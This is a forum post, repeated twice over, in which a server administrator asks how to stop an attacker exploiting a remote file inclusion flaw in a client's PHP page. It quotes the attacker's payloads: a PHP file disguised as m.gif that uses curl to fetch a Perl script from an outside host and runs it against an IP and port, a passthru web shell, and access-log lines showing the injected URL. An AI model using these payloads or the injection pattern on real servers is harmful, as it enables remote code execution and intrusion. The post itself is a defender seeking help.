Hi!
A hacker is uploading shell scripts to /tmp on one server through a clients php script.
The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's php commands in the file.
You can probably see it live by going to the urls in log below.
Anyway - any idea on how to stop this ?
Disable a funktion in PHP maybe but hopefully non that will affect other clients.
Or a mod_sec rule maybe.
I have blocket his IP offcourse as welll as the server the php commands on.
m.gif=
<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>
pass.gif=
<?
passthru($_GET['cmd']);
?>
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
A hacker is uploading shell scripts to /tmp on one server through a clients php script.
The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's php commands in the file.
You can probably see it live by going to the urls in log below.
Anyway - any idea on how to stop this ?
Disable a funktion in PHP maybe but hopefully non that will affect other clients.
Or a mod_sec rule maybe.
I have blocket his IP offcourse as welll as the server the php commands on.
m.gif=
<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>
pass.gif=
<?
passthru($_GET['cmd']);
?>
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows